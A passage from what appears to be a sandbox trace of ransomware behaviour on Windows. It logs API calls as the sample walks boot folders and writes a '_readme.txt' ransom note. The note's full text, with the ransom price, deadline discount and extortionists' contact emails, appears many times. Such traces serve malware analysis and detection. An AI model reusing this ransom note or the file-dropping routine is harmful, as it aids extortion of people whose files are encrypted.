tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.913] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.913] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.913] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.913] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.914] CloseHandle (hObject=0x5cc) returned 1 [0090.915] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.915] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.915] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.915] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.915] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.915] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.915] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.915] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.915] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.915] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa340adc0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.916] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa340adc0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.916] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.916] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.916] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.918] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.918] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.927] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.927] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.927] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.931] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0090.931] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.931] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.931] PathFindFileNameW (pszPath="") returned="" [0090.931] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.932] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.932] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.932] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.932] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0090.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.933] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0090.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.934] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.934] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.934] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal 